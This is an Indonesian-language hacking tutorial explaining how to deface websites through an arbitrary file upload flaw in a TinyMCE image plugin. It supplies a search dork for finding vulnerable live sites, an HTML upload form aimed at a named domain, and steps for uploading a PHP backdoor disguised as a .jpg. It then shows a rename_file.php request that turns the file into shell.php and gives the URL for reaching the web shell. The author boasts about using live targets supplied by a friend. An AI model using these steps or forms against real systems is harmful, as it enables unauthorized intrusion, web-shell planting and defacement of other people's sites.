Cara deface Tinymce Arbitrary File Upload

-
Hai Sobat.
Saya ikal
Disini, saya akan share cara deface Tinymce AFU
-

Apasih AFU itu? Itu adalah singkatan dari Arbitary File Upload yah saya singkat saja, jadi sesuai judul kita bakal lakuin poc ini, "bang bisa upload shell ga bang?" woah jelas bisa. Intinya hoki-hokian aja, soalnya nih poc dah lama dan pastinya live target pun menipis.

Okeh langsung saja,
Bahan :
- dork : 
inurl:/tinymce/plugins/image/ "upload.php"
- shell backdoor extensi .jpg
- csrf : 
<form enctype="multipart/form-data" action="https://lon-t.online/[path]/tinymce/plugins/image/upload.php" method="post"><input type="file" name="upl" multiple="multiple"><input type="submit" value="Upload"></form>

1. Pertama, kalian rename terlebih dahulu shell backdoor kalian dari extensi .php menjadi .jpg.
2.  Dorking dengan dork diatas, pilih salah satu target jika vuln maka akan muncul tulisan seperti ini

{"success":false,"is_pdf":0,"reason":"File not selected."}


lalu salin semua urlnya dari http atau https sampai /upload.php
3. Salin semua source code csrf nya lalu pergi ke app coding html apa saja, disini saya pakai anwriter yah, jika app sudah di buka, sekarang tempel semua source code nya ke anwriter.


4. Edit dari bagian 
action="TARGET LU/[path]/tinymce/plugins/image/upload.php" 
atau 
action="TARGET LU/tinymce/plugins/image/upload.php" 

5. Klik titik 3 di pojok kanan atas, lalu klik Save as dan beri nama filenya Y.html lalu klik save
6. Pergi ke Filemanager di handphone kalian dan cari file yang bernama Y.html tadi dan klik buka di browser atau buka dengan chrome.

Maka tampilannya akan seperti ini : 


Muncul uploader, sekarang kalian upload shell backdoor kalian yang berextensi .jpg tadi lalu klik upload dan tampilan akan berubah seperti ini :

{"success":true,"is_pdf":0,"file":"BASE_PATHtracks\/tinymce\/plugins\/image\/uploads\/SHELL LU.jpg"}


7. Shell sudah terupload, namun masih berextensi .jpg jadi kita akan merename nya dengan file bawaan dari plugins tinymce yaitu rename_file.php 

Jika tidak ada file tersebut berarti kalian ke duluan orang lain xixi.

"Cara renamenya gimana bang?" Gampang euyy.
Kalian tingagal exploit seperti ini : 
https://lon-t.online/tinymce/plugins/image/rename_file.php?current_name=SHELL JPG YANG TADI TERUPLOAD.jpg&new_name=shell.php
Atau 
https://lon-t.online/[path]/tinymce/plugins/image/rename_file.php?current_name=SHELL JPG YANG TADI TERUPLOAD.jpg&new_name=shell.php

Dan jika berhasil akan muncul seperti ini


8. Jika sudah terrename, tinggal akses saja shell nya. Path shell berada di :
https://lon-t.online/tinymce/plugins/image/uploads/shell.php
Atau
https://lon-t.online/[path]/tinymce/plugins/image/uploads/shell.php

Okeh mungkin segini saja.
Thanks buat kawan gw Mr.Phantom atas live target nya xixi.
"Bang kok lu di kasih mulu live targetnya? Ga bisa nyari sendiri yah?" Terus guna nya temen apa anjing kalo ga di manfaatin xixixi

Thanks 
See u